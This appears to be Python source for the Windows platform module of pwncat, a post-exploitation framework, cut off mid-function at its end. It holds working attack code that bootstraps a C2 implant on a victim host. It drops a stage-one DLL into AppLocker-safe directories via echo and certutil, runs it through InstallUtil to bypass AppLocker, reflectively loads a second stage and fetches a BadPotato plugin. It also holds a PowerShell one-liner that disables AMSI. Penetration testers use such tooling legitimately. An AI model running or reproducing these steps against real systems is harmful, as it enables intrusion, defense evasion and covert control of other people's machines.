"""
This platform supports interaction with a Windows target where either a cmd.exe
or powershell.exe stdio is connected directly to the active channel. pwncat will
utilize the C2 libraries located at `pwncat-windows-c2 <https://github.com/calebstewart/pwncat-windows-c2>`_
This will be automatically downloaded to the directory identified by the
``windows_c2_dir`` configuration which defaults to ``~/.local/share/pwncat/``.
It will be uploaded and executed via ``Install-Util`` in order to automatically
bypass AppLocker, and will provide you an un-logged, unconstrained powershell
session as well as basic process and file IO routines.

When operating in a platform-specific environment, you can safely execute multiple
processes and open multiple files with this platform. However, you should be
careful to cleanup all processes and files prior to return from your method
or code as the C2 will not attempt to garbage collect file or process handles.
"""
import sys
import gzip
import json
import stat
import time
import base64
import shutil
import hashlib
import pathlib
import tarfile
import binascii
import readline  # noqa: F401
import functools
import threading
import subprocess
from io import BytesIO, RawIOBase, TextIOWrapper
from typing import List, Union, BinaryIO, Optional
from subprocess import TimeoutExpired, CalledProcessError
from dataclasses import dataclass

import requests

import pwncat
import pwncat.util
import pwncat.subprocess
from pwncat.platform import Path, Platform, PlatformError

INTERACTIVE_END_MARKER = b"INTERACTIVE_COMPLETE\r\n"
PWNCAT_WINDOWS_C2_VERSION = "v0.2.1"
PWNCAT_WINDOWS_C2_RELEASE_URL = "https://github.com/calebstewart/pwncat-windows-c2/releases/download/{version}/pwncat-windows-{version}.tar.gz"


class PowershellError(PlatformError):
    """Executing a powershell script caused an error"""

    def __init__(self, msg):
        super().__init__(msg)

        self.message = msg


class ProtocolError(PlatformError):
    def __init__(self, code: int, message: str):
        self.code = code
        self.message = message

        super().__init__(self.message)


@dataclass
class stat_result:
    """Python `os` doesn't provide a way to sanely construct a stat_result
    so I created this."""

    st_mode = 0
    st_ino = 0
    st_dev = 0
    st_nlink = 0
    st_uid = 0
    st_gid = 0
    st_size = 0
    st_atime = 0
    st_mtime = 0
    st_ctime = 0
    st_atime_ns = 0
    st_mtime_ns = 0
    st_ctime_ns = 0
    st_blocks = 0
    st_blksize = 0
    st_rdev = 0
    st_flags = 0
    st_gen = 0
    st_birthtime = 0
    st_fstype = 0
    st_rsize = 0
    st_creator = 0
    st_type = 0
    st_file_attributes = 0
    st_reparse_tag = 0


class WindowsFile(RawIOBase):
    """Wrapper around file handles on Windows"""

    def __init__(self, platform: "Windows", mode: str, handle: int, name: str = None):
        self.platform = platform
        self.mode = mode
        self.handle = handle
        self.is_open = True
        self.eof = False
        self.name = name

    def readable(self) -> bool:
        return "r" in self.mode

    def writable(self) -> bool:
        return "w" in self.mode

    def close(self):
        """Close a file handle on the remote host"""

        if not self.is_open:
            return

        self.platform.run_method("File", "close", self.handle)
        self.is_open = False

        return

    def readall(self):
        """Read until EOF"""

        data = b""

        while not self.eof:
            new = self.read(4096)
            if new is None:
                continue
            data += new

        return data

    def readinto(self, b: Union[memoryview, bytearray]):

        if self.eof:
            return 0

        try:
            result = self.platform.run_method("File", "read", self.handle, len(b))
        except ProtocolError as exc:

            # ERROR_BROKEN_PIPE
            if exc.code == 0x6D:
                self.eof = True
                return 0

            raise IOError(exc.message) from exc

        data = base64.b64decode(result["data"])
        b[: len(data)] = data

        if len(data) == 0:
            self.eof = True

        return len(data)

    def write(self, data: bytes):
        """Write data to this file"""

        if self.eof:
            return 0

        nwritten = 0
        while nwritten < len(data):
            chunk = data[nwritten:]

            try:
                result = self.platform.run_method(
                    "File",
                    "write",
                    self.handle,
                    base64.b64encode(chunk).decode("utf-8"),
                )
            except ProtocolError as exc:
                # ERROR_BROKEN_PIPE
                if exc.code == 0x6D:
                    self.eof = True
                    break
                raise IOError(exc.message) from exc

            nwritten += result["count"]

        return nwritten


class DotNetPlugin(object):
    """Represents a reflectively loaded .Net plugin within the remote C2
    This class is a helper which makes calling methods within a plugin
    more straightforward. If you want to call a method named ``get_system``
    you can use one of two syntaxes:

    .. code-block:: python

        plugin.run("get_system", "arguments", 1, 2, False)
        plugin.get_system("arguments", 1, 2, False)

    :param name: basename of the file which was loaded
    :type name: str
    :param checksum: md5sum of the assembly
    :type checksum: str
    :param ident: identifier for the remote assembly
    :type ident: int
    """

    def __init__(self, platform: "Windows", name: str, checksum: str, ident: int):

        self.names = [name]
        self.checksum = checksum
        self.ident = ident
        self.platform = platform

    def __getattr__(self, key: str):
        """Shortcut for calling a method. ``plugin.method()`` is equivalent
        to ``plugin.run("method")``."""
        return functools.partial(self.run, key)

    def run(self, method: str, *args):
        """Execute a method within the plugin"""

        return self.platform.run_method("Reflection", "call", self.ident, method, args)


class PopenWindows(pwncat.subprocess.Popen):
    """
    Windows-specific Popen wrapper class
    """

    def __init__(
        self,
        platform: Platform,
        args,
        stdout,
        stdin,
        stderr,
        text,
        encoding,
        errors,
        bufsize,
        result,
    ):
        super().__init__()

        self.platform = platform
        self.handle = result["handle"]
        self.stdio = [result["stdin"], result["stdout"], result["stderr"]]
        self.returncode = None

        self.stdin = WindowsFile(platform, "w", result["stdin"])
        self.stdout = WindowsFile(platform, "r", result["stdout"])
        self.stderr = WindowsFile(platform, "r", result["stderr"])

        if stdout != subprocess.PIPE:
            self.stdout.close()
            self.stdout = None
        if stderr != subprocess.PIPE:
            self.stderr.close()
            self.stderr = None
        if stdin != subprocess.PIPE:
            self.stdin.close()
            self.stdin = None

        if text or encoding is not None or errors is not None:
            line_buffering = bufsize == 1
            bufsize = -1

            if self.stdout is not None:
                self.stdout = TextIOWrapper(
                    self.stdout,
                    line_buffering=line_buffering,
                    encoding=encoding,
                    errors=errors,
                )
            if self.stderr is not None:
                self.stderr = TextIOWrapper(
                    self.stderr,
                    line_buffering=line_buffering,
                    encoding=encoding,
                    errors=errors,
                )
            if self.stdin is not None:
                self.stdin = TextIOWrapper(
                    self.stdin, encoding=encoding, errors=errors, write_through=True
                )

    def detach(self):

        self.returncode = 0

        if self.stdout is not None:
            self.stdout.close()
        if self.stderr is not None:
            self.stderr.close()
        if self.stdin is not None:
            self.stdin.close()

    def kill(self):
        return self.terminate()

    def terminate(self):

        if self.returncode is not None:
            return

        self.platform.run_method("Process", "kill", self.handle, 0)
        self.returncode = -1

    def poll(self):
        """Poll if the process has completed and get return code"""

        if self.returncode is not None:
            return self.returncode

        try:
            result = self.platform.run_method("Process", "poll", self.handle)
        except ProtocolError as exc:
            raise RuntimeError(exc.message)

        if result["stopped"]:
            self.returncode = result["code"] or 0
            return self.returncode

    def wait(self, timeout: float = None):

        if timeout is not None:
            end_time = time.time() + timeout
        else:
            end_time = None

        while self.poll() is None:
            if end_time is not None and time.time() >= end_time:
                raise TimeoutExpired(self.args, timeout)

            time.sleep(0.1)

        self.cleanup()
        return self.returncode

    def cleanup(self):
        if self.stdout is not None:
            self.stdout.close()
        if self.stdin is not None:
            self.stdin.close()
        if self.stderr is not None:
            self.stderr.close()

        # This just forces CloseHandle on the hProcess
        WindowsFile(self.platform, "r", self.handle).close()

        self.handle = None
        self.stdout = None
        self.stderr = None
        self.stdin = None

    def communicate(self, input=None, timeout=None):

        if self.returncode is not None:
            return (None, None)

        if input is not None and self.stdin is not None:
            self.stdin.write(input)

        if timeout is not None:
            end_time = time.time() + timeout
        else:
            end_time = None

        stdout = (
            "" if self.stdout is None or isinstance(self.stdout, TextIOWrapper) else b""
        )
        stderr = (
            "" if self.stderr is None or isinstance(self.stderr, TextIOWrapper) else b""
        )

        while self.poll() is None:
            if end_time is not None and time.time() >= end_time:
                raise TimeoutExpired(self.args, timeout, stdout)
            if self.stdout is not None:
                new_stdout = self.stdout.read(4096)
                if new_stdout is not None:
                    stdout += new_stdout
            if self.stderr is not None:
                new_stderr = self.stderr.read(4096)
                if new_stderr is not None:
                    stderr += new_stderr

        if self.stdout is not None:
            while True:
                new = self.stdout.read(4096)
                stdout += new
                if len(new) == 0:
                    break

        if self.stderr is not None:
            while True:
                new = self.stderr.read(4096)
                stderr += new
                if len(new) == 0:
                    break

        if len(stderr) == 0:
            stderr = None
        if len(stdout) == 0:
            stdout = None

        self.cleanup()

        return (stdout, stderr)


@dataclass
class BuiltinPluginInfo:
    """Tells pwncat where to find a builtin plugin"""

    name: str
    """ A friendly name used when loading the plugin """
    provides: List[str]
    """ List of DLL names which this plugin provides """
    url: str
    """ URL pointing to a tar.gz file containing the plugin DLL(s) """
    version: str
    """ The version number to download (this is formatted into the URL) """


class Windows(Platform):
    """Concrete platform class abstracting interaction with a Windows/
    Powershell remote host. The remote windows host must support
    powershell for this platform to function, and the channel must be
    established with an open powershell session."""

    name = "windows"
    PATH_TYPE = pathlib.PureWindowsPath
    C2_VERSION = "v0.2.1"
    PLUGIN_INFO = [
        BuiltinPluginInfo(
            name="windows-c2",
            provides=["stageone.dll", "stagetwo.dll"],
            url="https://github.com/calebstewart/pwncat-windows-c2/releases/download/{version}/pwncat-windows-{version}.tar.gz",
            version="v0.2.1",
        ),
        BuiltinPluginInfo(
            name="badpotato",
            provides=["BadPotato.dll"],
            url="https://github.com/calebstewart/pwncat-badpotato/releases/download/{version}/pwncat-badpotato-{version}.tar.gz",
            version="v0.0.1-alpha",
        ),
    ]

    @classmethod
    def open_plugin(cls, manager: "pwncat.manager.Manager", name: str) -> BytesIO:
        """
        Open the given plugin DLL for reading and return an open file object.
        If the given name matches a builtin plugin, it will be used. If a
        builtin plugin is not available, it will be downloaded from it's URL
        and saved in the provided plugin path. If the name does not match a
        provided plugin DLL, it is interpreted as a path and attempted to be
        opened.

        :param manager: the pwncat manager object used to locate the plugin directory
        :type manager: pwncat.manager.Manager
        :param name: name of the plugin being requested
        :type name: str
        :rtype: BytesIO
        """

        for plugin in cls.PLUGIN_INFO:
            if name in plugin.provides:
                break
        else:
            return open(name, "rb")

        path = (
            pathlib.Path(manager.config["plugin_path"])
            / plugin.name
            / plugin.version
            / name
        ).expanduser()
        if not path.exists():
            path.parent.mkdir(parents=True, exist_ok=True)
            url = plugin.url.format(version=plugin.version)

            manager.log(f"[blue]windows[/blue]: downloading {plugin.name} plugin")
            with requests.get(
                url,
                stream=True,
            ) as request:
                data = request.raw.read()
                with tarfile.open(mode="r:gz", fileobj=BytesIO(data)) as tar:
                    for provided in plugin.provides:
                        with tar.extractfile(provided) as provided_filp:
                            with (path.parent / provided).open("wb") as output:
                                shutil.copyfileobj(provided_filp, output)

        return path.open("rb")

    def __init__(
        self,
        session: "pwncat.session.Session",
        channel: pwncat.channel.Channel,
        *args,
        **kwargs,
    ):
        super().__init__(session, channel, *args, **kwargs)

        self.name = "windows"
        self.plugins = []

        # Initialize interactive tracking
        self._interactive = False
        self.interactive_tracker = 0

        # This is set when bootstrapping stage two
        self.host_uuid = None

        # Most Windows connections aren't capable of a PTY, and checking
        # is difficult this early. We will assume there isn't one.
        self.has_pty = True

        # Tracks paths to modules which have been sideloaded into powershell
        self.psmodules = []

        self._bootstrap_stage_two()

        self.refresh_uid()

        self.setup_prompt()

        # Load requested libraries
        # for library, methods in self.LIBRARY_IMPORTS.items():
        #     self._load_library(library, methods)

    def exit(self):
        """Ensure the C2 exits on the victim end. This is called automatically
        by session.close, and shouldn't be called manually."""

        self.run_method("StageTwo", "exit")

    def parse_response(self, data: bytes):
        """Parse a line of data from the C2"""

        with gzip.GzipFile(
            fileobj=BytesIO(base64.b64decode(data.decode("utf-8").strip())),
            mode="rb",
        ) as gz:
            result = json.loads(gz.read().decode("utf-8"))

        return result

    def run_method(self, typ: str, method: str, *args, wait: bool = True):
        r"""
        Execute a method within the pwncat-windows-c2. You must specify the type
        and method arguments. Arguments are passed via json encoding so any valid
        JSON types should be passed correctly onto the C2. Named arguments are not
        supported. Results are returned as a dictionary. In the case of an error,
        a ProtocolError is raised with the error code and message.

        :param typ: The type name where the method you'd like to execute resides
        :type typ: str
        :param method: The name of the method you'd like to execute
        :type method: str
        :param \*args: the positional arguments for the method you are calling
        :type \*args: correct type for given method
        """

        command = [typ, method, *args]
        payload = BytesIO()

        # compress command arguments
        with gzip.GzipFile(fileobj=payload, mode="wb") as gz:
            gz.write(json.dumps(command).encode("utf-8"))

        # Send the command
        thing = base64.b64encode(payload.getbuffer())
        self.channel.sendline(thing)

        if wait:

            keyboard_interrupt = False

            # Receive the response
            while True:
                try:
                    result = self.parse_response(self.channel.recvline())
                    break
                except (gzip.BadGzipFile, binascii.Error):
                    continue
                except KeyboardInterrupt:
                    self.session.log(
                        "[yellow]warning[/yellow]: waiting for command to complete"
                    )
                    keyboard_interrupt = True

            if keyboard_interrupt:
                raise KeyboardInterrupt

            # Raise an appropriate error if needed
            if result["error"] != 0:
                raise ProtocolError(result["error"], result.get("message", ""))

            return result["result"]

    def setup_prompt(self):
        """Set a prompt method for powershell to ensure our prompt looks pretty :)"""

        self.powershell(
            """
function prompt {
  $ESC = [char]27
  Write-Host "$ESC[31m(remote)$ESC[33m $env:UserName@$env:ComputerName$ESC[0m:$ESC[36m$($executionContext.SessionState.Path.CurrentLocation)$ESC[0m$" -NoNewLine
  return " "
}"""
        )

    def _bootstrap_stage_two(self):
        """This routine upgrades a standard powershell or cmd shell to an
        instance of the pwncat stage two C2. It will first locate a valid
        writable temporary directory (from the list below) and then upload
        stage one to that directory. Stage one is a simple DLL which receives
        a base64 encoded, gzipped payload to reflectively load and execute.
        We run stage one using Install-Util to bypass applocker."""

        possible_dirs = [
            "\\Windows\\Tasks",
            "\\Windows\\Temp",
            "\\windows\\tracing",
            "\\Windows\\Registration\\CRMLog",
            "\\Windows\\System32\\FxsTmp",
            "\\Windows\\System32\\com\\dmp",
            "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys",
            "\\Windows\\System32\\spool\\PRINTERS",
            "\\Windows\\System32\\spool\\SERVERS",
            "\\Windows\\System32\\spool\\drivers\\color",
            "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter",
            "\\Windows\\System32\\Tasks_Migrated",
            "\\Windows\\SysWOW64\\FxsTmp",
            "\\Windows\\SysWOW64\\com\\dmp",
            "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter",
            "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System",
        ]
        chunk_sz = 1900

        loader_encoded_name = pwncat.util.random_string()

        # Read the loader
        # with stageone.open("rb") as filp:
        with Windows.open_plugin(self.manager, "stageone.dll") as filp:
            loader_dll = base64.b64encode(filp.read())

        # Extract first chunk
        chunk = loader_dll[0:chunk_sz].decode("utf-8")
        good_dir = None
        loader_remote_path = None

        self.channel.recvuntil(b">")

        # Find available file by trying to write first chunk
        for possible in possible_dirs:
            loader_remote_path = pathlib.PureWindowsPath(possible) / loader_encoded_name
            good_dir = possible
            self.channel.send(
                f"""echo {chunk} >"{str(loader_remote_path)}"\n""".encode("utf-8")
            )
            self.channel.recvline()
            result = self.channel.recvuntil(b">")
            if b"denied" not in result.lower():
                self.session.log(
                    f"dropping stage one in {repr(str(loader_remote_path))}"
                )
                break
        else:
            raise PlatformError("no writable applocker-safe directories")

        # Write remaining chunks to selected path
        for c in range(chunk_sz, len(loader_dll), chunk_sz):
            self.channel.send(
                f"""echo {loader_dll[c:c+chunk_sz].decode('utf-8')} >>"{str(loader_remote_path)}"\n""".encode(
                    "utf-8"
                )
            )
            self.channel.recvline()
            self.channel.recvuntil(b">")

        # Decode the base64 to the actual dll
        self.channel.send(
            f"""certutil -decode "{str(loader_remote_path)}" "{good_dir}\\{loader_encoded_name}.dll"\n""".encode(
                "utf-8"
            )
        )
        self.channel.recvline()
        self.channel.recvuntil(b">")

        self.channel.send(f"""del "{str(loader_remote_path)}"\n""".encode("utf-8"))
        self.channel.recvline()
        self.channel.recvuntil(b">")

        # Search for all instances of InstallUtil within all installed .Net versions
        self.channel.send(
            """cmd /c "dir \\Windows\\Microsoft.NET\\* /s/b | findstr InstallUtil.exe$"\n""".encode(
                "utf-8"
            )
        )
        self.channel.recvline()

        # Select the newest version
        result = self.channel.recvuntil(b">").decode("utf-8")
        install_utils = [
            x.rstrip("\r") for x in result.split("\n") if x.rstrip("\r") != ""
        ][-2]

        version = pathlib.PureWindowsPath(install_utils).parts[-2]

        self.session.log(
            f"using install utils from .net [cyan]{version}[/cyan]", highlight=False
        )

        install_utils = install_utils.replace(" ", "\\ ")

        # Execute Install-Util to bypass AppLocker/CLM
        self.channel.send(
            f"""{install_utils} /logfile= /LogToConsole=false /U "{good_dir}\\{loader_encoded_name}.dll"\n""".encode(
                "utf-8"
            )
        )

        # Wait for loader to
        self.channel.recvuntil(b"READY")
        self.channel.recvuntil(b"\n")

        # Load, Compress and Encode stage two
        with Windows.open_plugin(self.manager, "stagetwo.dll") as filp:
            stagetwo_dll = filp.read()
            compressed = BytesIO()
            with gzip.GzipFile(fileobj=compressed, mode="wb") as gz:
                gz.write(stagetwo_dll)
            encoded = base64.b64encode(compressed.getvalue())

        # Send stage two
        self.channel.sendline(encoded)

        # Wait for stage two to be loaded
        self.channel.recvuntil(b"READY")
        self.channel.recvuntil(b"\n")

        # Read host-specific GUID
        self.host_uuid = self.channel.recvline().strip().decode("utf-8")

        # Bypass AMSI
        try:
            self.powershell(
                """$am = ([Ref].Assembly.GetTypes()  | % { If ( $_.Name -like "*iUtils" ){$_} })[0];$con = ($am.GetFields('NonPublic,Static') | % { If ( $_.Name -like "*Context" ){$_} })[0];$addr = $con.GetValue($null);[IntPtr]$ptr = $addr;[Int32[]]$buf = @(0); if( $ptr -ne $null -and $ptr -ne 0 ) { [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1); }"""
            )
        except PowershellError:
            self.session.log("[yellow]warning[/yellow]: failed to disable AMSI!")

    def get_pty(self):
        """We don't need to do this for windows"""

    def Popen(
        self,
        args,
        bufsize=-1,
        stdin=None,
        stdout=None,
        stderr=None,
        shell=False,
        cwd=None,
        encoding=None,
        text=None,
        errors=None,
        env=None,
        bootstrap_input=None,
        **other_popen_kwargs,
    ) -> pwncat.subprocess.Popen:

        if self.interactive:
            raise PlatformError(
                "cannot open non-interactive process in interactive mode"
            )

        if shell:
            if isinstance(args, list):
                args = [
                    "powershell.exe",
                    "-noprofile",
                    "-command",
                    subprocess.list2cmdline(args),
                ]
            else:
                args = ["powershell.exe", "-noprofile", "-command", args]

        # This is apparently what subprocess.Popen does on windows...
        if isinstance(args, list):
            args = subprocess.list2cmdline(args)
        elif not isinstance(args, str):
            raise ValueError("expected command string or list of arguments")

        try:
            result = self.run_method("Process", "start", args)
        except ProtocolError as exc:
            if "pipe" in exc.message:
                raise OSError(exc.message)
            else:
                raise FileNotFoundError(exc.message)

        return PopenWindows(
            self,
            args,
            stdout,
            stdin,
            stderr,
            text,
            encoding,
            errors,
            bufsize,
            result,
        )

    def get_host_hash(self):
        """
        Unique host identifier for this target. It is taken from the unique
        cryptographic GUID stored in the windows registry at install.
        """
        return self.host_uuid

    def interactive_loop(self, interactive_complete: "threading.Event"):
        """
        Interactively read input from the attacker and send it to an interactive
        terminal on the victim. `RawModeExit` and `ChannelClosed` exceptions
        are handled by the manager appropriately. If any changes are made to the
        local TTY, they should be reverted before returning (ideally via a try-finally
        block). Output from the remote host is automatically piped to stdout via
        a background thread by the manager.
        """

        pwncat.util.push_term_state()

        try:
            while not interactive_complete.is_set():
                try:
                    data = input()
                    self.channel.send(data.encode("utf-8") + b"\r")
                except KeyboardInterrupt:
                    if not interactive_complete.is_set():
                        sys.stdout.write("\n")
                        self.session.manager.log(
                            "[yellow]warning[/yellow]: Ctrl-C does not work for windows targets"
                        )
                except EOFError:
                    self.channel.send(b"\rexit\r")
                    interactive_complete.wait()
        except KeyboardInterrupt:
            # This should only happen during an EOFError above
            pass
        finally:
            pwncat.util.pop_term_state()

    @property
    def interactive(self):
        return self._interactive

    @interactive.setter
    def interactive(self, value):

        if value == self._interactive:
            return

        # Reset the tracker

        if value:
            try:
                self.run_method("PowerShell", "start", wait=False)
            except ProtocolError as exc:
                raise PlatformError(exc.message)

            # Wait for the powershell runspace to be up and running
            output = self.channel.recvline()
            if not output.strip().startswith(b"INTERACTIVE_START"):
                self.interactive_tracker = len(INTERACTIVE_END_MARKER)
                result = self.parse_response(output)
                raise PlatformError(result["message"])

            self._interactive = True
            self.interactive_tracker = 0
            return
        if not value:

            # Receive the method response
            data = self.parse_response(self.channel.recvline())
            if data["error"] != 0:
                self.session.log(data["message"])

            self._interactive = False
            self.refresh_uid()

    def process_output(self, data: bytes):
        """Process stdout while in interactive mode. This is called
        each time the victim output thread receives data. You can modify
        the input data and return a new copy if needed before output to
        the screen.

        :param data: the data received from the victim in interactive mode
        :type data: bytes
        """

        transformed = bytearray(b"")
        has_cr = False

        for idx, b in enumerate(data):

            # Basically, we just transform bare \r to \r\n
            if has_cr and b != ord("\n"):
                transformed.append(ord("\n"))

            # Track whether we had a carriage return
            has_cr = b == ord("\r")

            # Add the character to the resulting array
            transformed.append(b)

            # Track interactive exit that we didn't explicitly request
            if INTERACTIVE_END_MARKER[self.interactive_tracker] == b:
                self.interactive_tracker += 1
                if self.interactive_tracker == len(INTERACTIVE_END_MARKER):
                    self.interactive_tracker = 0
                    self.channel.unrecv(data[idx + 1 :])
                    raise pwncat.util.RawModeExit
            else:
                self.interactive_tracker = 0

        # Return transformed data
        return transformed

    def open(
        self,
        path: Union[str, Path],
        mode: str = "r",
        buffering: int = -1,
        encoding: str = "utf-8",
        errors: str = None,
        newline: str = None,
    ):
        """Mimic the built-in open method."""

        # Ensure all mode properties are valid
        for char in mode:
            if char not in "rwb":
                raise PlatformError(f"{char}: unknown file mode")

        # Save this just in case we are opening a text-mode stream
        line_buffering = buffering == -1 or buffering == 1

        # For text-mode files, use default buffering for the underlying binary
        # stream.
        if "b" not in mode:
            buffering = -1

        try:
            result = self.run_method("File", "open", path, mode)
        except ProtocolError as exc:
            raise FileNotFoundError(f"{path}: {exc.message}")

        stream = WindowsFile(self, mode, result["handle"], name=path)

        if "b" not in mode:
            stream = TextIOWrapper(
                stream,
                encoding=encoding,
                errors=errors,
                newline=newline,
                write_through=True,
                line_buffering=line_buffering,
            )

        return stream

    def _do_which(self, path: str):
        """Locate a binary of the victim. This implements the actual interaction
        with the victim. The `Platform.which` method implements the caching mechanism.

        :param path: name of the binary you are looking for
        :type path: str
        """

        try:
            p = self.run(
                ["where.exe", path], capture_output=True, text=True, check=True
            )

            return p.stdout.strip()
        except CalledProcessError:
            return None

    def refresh_uid(self):
        """Retrieve the current user ID. For Windows, this is done
        through System.Security.Principal.WindowsIdentity::GetCurrent().User."""

        self.user_info = self.powershell(
            "[System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value"
        )[0]

        # Check if we are an administrator
        try:
            result = self.powershell(
                "(New-Object System.Security.Principal.WindowsPrincipal([System.Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)"
            )

            if not result:
                # this failed... so let's not raise an exception because that
                # would break a lot of stuff
                self._is_admin = False

            self._is_admin = result[0]
        except PowershellError:
            # it failed, so safely ignore and continue
            self._is_admin = False

        # Check if we are SYSTEM
        try:
            username = self.powershell("[System.Environment]::UserName")

            if not username:
                # this failed... so let's not raise an exception because that
                # would break a lot of stuff
                self._is_system = False

            self._is_system = bool(username[0].strip() == "SYSTEM")

        except PowershellError:
            # it failed, so safely ignore and continue
            self._is_system = False

    def getuid(self):
        """Retrieve the cached User ID"""

        return self.user_info

    def new_item(self, **kwargs):
        """Run the `New-Item` commandlet with specified arguments and
        raise the appropriate local exception if required. For a list of
        valid arguments, see the New-Item help documentation."""

        command = "New-Item "
        for arg, value in kwargs.items():
            if value is None:
                command += "-" + arg + " "
            else:
                command += f'-{arg} "{value}"'

        try:
            result = self.powershell(command)
            return result[0]
        except PowershellError as exc:
            if "not exist" in exc:
                raise FileNotFoundError(kwargs["Path"])
            elif "exist" in exc:
                raise FileExistsError(kwargs["Path"])
            elif "directory":
                raise NotADirectoryError(kwargs["Path"])
            else:
                raise PermissionError(kwargs["Path"])

    def abspath(self, path: str) -> str:
        """Convert the given relative path to absolute.

        :param path: a relative path
        :type path: str
        :returns: an equivalent absolute path
        :rtype: str
        """

        try:
            result = self.powershell(
                f'$ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath("{path}")'
            )
            return result[0]
        except PowershellError as exc:
            raise FileNotFoundError(path) from exc

    def chdir(self, path: str):
        """Change the current working directory"""

        try:
            result = self.powershell(f'$_ = (pwd) ; cd "{path}" ; $_ | Select Path')

            return result[0]["Path"]
        except PowershellError as exc:
            if "not exist" in str(exc):
                raise FileNotFoundError(path) from exc
            raise PermissionError(path) from exc

    def chmod(self, path: str, mode: int):
        """Change a file's mode. Per the python documentation, this is only
        used to change the read-only flag for the Windows platform."""

        try:
            if mode & stat.S_IWRITE:
                value = "$false"
            else:
                value = "$true"

            self.powershell(
                f'Set-ItemProperty -Path "{path}" -Name IsReadOnly -Value {value}'
            )
        except PowershellError as exc:
            if "not exist" in str(exc):
                raise FileNotFoundError(path) from exc
            raise PermissionError(path) from exc

    def getenv(self, name: str) -> str:
        """Retrieve the value of a given environment variable in the
        current shell.

        :param name: name of the environment variable
        :type name: str
        :returns: value of the variable
        :rtype: str
        """

        try:
            result = self.powershell(f"$env:{name}")
            return result[0]
        except PowershellError as exc:
            raise KeyError(name) from exc

    def link_to(self, target: str, path: str):
        """Create hard link at ``path`` pointing to ``target``. This will
        likely result in a PermissionError exception on Windows. It is
        implemented with the New-Item powershell commandlet.

        :param target: the path to the target of the link
        :type target: str
        :param path: the path to the new link object
        :type path: str
        """

        self.new_item(ItemType="HardLink", Path=path, Target=target)

    def symlink_to(self, target: str, path: str):
        """Create a symlink at ``path`` pointing to ``target``. This is
        implemented using the New-Item powershell commandlet.

        :param target: the path to the target of the link
        :type target: str
        :param path: the path to the new link object
        :type path: str
        """

        self.new_item(ItemType="SymbolicLink", Path=path, Target=target)

    def listdir(self, path: str):
        """Return a list of items in the directory at the given relative
        or absolute directory path.

        :param path: relative or abosolute directory path
        :type path: str
        :returns: list of file or directory names
        :rtype: List[str]
        """

        try:
            result = self.powershell(f'Get-ChildItem -Force -Path "{path}" | Select ')

            # Check if there were no entries
            if not result:
                return []

            # Check if there was one entry
            if isinstance(result[0], dict):
                return [result[0]["Name"]]

            return [r["Name"] for r in (result[0] if len(result) else [])]
        except PowershellError as exc:
            if "not exist" in str(exc):
                raise FileNotFoundError(path)
            elif "directory" in str(exc):
                raise NotADirectoryError(path)
            else:
                raise PermissionError(path)

    def lstat(self):
        """Perform stat on a link instead of the target of the link."""

        raise PlatformError("lstat not implemented for Windows")

    def mkdir(self, path: str, mode: int = 0o777, parents: bool = True):
        """Create a new directory. This is implemented with the New-Item
        commandlet.

        :param path: path to the new directory
        :type path: str
        :param mode: permissions for the directory (ignored for windows)
        :type mode: int
        :param parents: whether to create all items (defaults to True for windows)
        """

        self.new_item(ItemType="Directory", Path=path)

    def readlink(self):
        """Read the target of a filesystem link"""

        raise PlatformError("readlink not implemented for Windows")

    def rename(self, src: str, dst: str):
        """Rename a file

        :param src: path to the source file
        :type src: str
        :param dst: path or new name for the destination file
        :type dst: str
        """

        try:
            self.powershell(f'Rename-Item -Path "{src}" -NewName "{dst}"')
        except PowershellError as exc:
            if "not exist" in str(exc):
                raise FileNotFoundError(src)
            raise PermissionError(src)

    def rmdir(self, path: str, recurse: bool = False):
        """Remove a directory, optionally remove all contents first.

        :param path: path to a directory to remove
        :type path: str
        :param recurse: whether to recursively remove all contents first
        :type recurse: bool
        """

        # This is a bad solution, but powershell is stupid
        # NOTE: this is because there's no way to stop powershell from prompting for confirmation
        if not recurse and len(self.listdir(path)) != 0:
            raise FileNotFoundError(path)

        try:
            command = f'Remove-Item -Force -Confirm:$false -Path "{path}"'
            if recurse:
                command += " -Recurse"
            self.powershell(command)
        except PowershellError as exc:
            if "not exist" in str(exc) or "empty" in str(exc):
                raise FileNotFoundError(path)
            raise PermissionError(path)

    def stat(self, path: str) -> stat_result:
        """Perform a stat on the given path, returning important file
        system details on the file.

        :param path: path to an existing file
        :type path: str
        :returns: the stat data
        :rtype: stat_result
        """

        try:
            props = self.powershell(f'Get-ItemProperty -Path "{path}"')[0]
        except PowershellError as exc:
            if "not exist" in str(exc):
                raise FileNotFoundError(path) from exc
            raise PermissionError(path) from exc

        result = stat_result()

        result.st_ctime_ns = (
            float(props["CreationTimeUtc"].split("(")[1].split(")")[0]) * 1000000.0
        )
        result.st_atime_ns = (
            float(props["LastAccessTimeUtc"].split("(")[1].split(")")[0]) * 1000000.0
        )
        result.st_mtime_ns = (
            float(props["LastWriteTimeUtc"].split("(")[1].split(")")[0]) * 1000000.0
        )
        result.st_size = props["Length"] if "Length" in props else 0
        result.st_dev = None
        result.st_nlink = None
        result.st_ino = None
        result.st_file_attributes = props["Attributes"]
        result.st_reparse_point = 0

        result.st_ctime = result.st_ctime_ns / 1000000000.0
        result.st_atime = result.st_atime_ns / 1000000000.0
        result.st_mtime = result.st_mtime_ns / 1000000000.0

        if result.st_file_attributes & stat.FILE_ATTRIBUTE_READONLY:
            result.st_mode |= stat.S_IREAD
        else:
            result.st_mode |= stat.S_IREAD | stat.S_IWRITE

        if result.st_file_attributes & stat.FILE_ATTRIBUTE_DEVICE:
            result.st_mode |= stat.S_IFBLK
        if result.st_file_attributes & stat.FILE_ATTRIBUTE_DIRECTORY:
            result.st_mode |= stat.S_IFDIR
        if result.st_file_attributes & stat.FILE_ATTRIBUTE_NORMAL:
            result.st_mode |= stat.S_IFREG
        elif result.st_file_attributes & stat.FILE_ATTRIBUTE_REPARSE_POINT:
            result.st_mode |= stat.S_IFLNK

        return result

    def tempfile(
        self, mode: str, length: Optional[int] = 8, suffix: Optional[str] = None
    ):
        """Create a temporary file in a safe directory. Optionally provide a suffix"""

        if suffix is None:
            suffix = ""
        else:
            suffix = "." + suffix

        # Get the temporary directory
        path = self.Path(
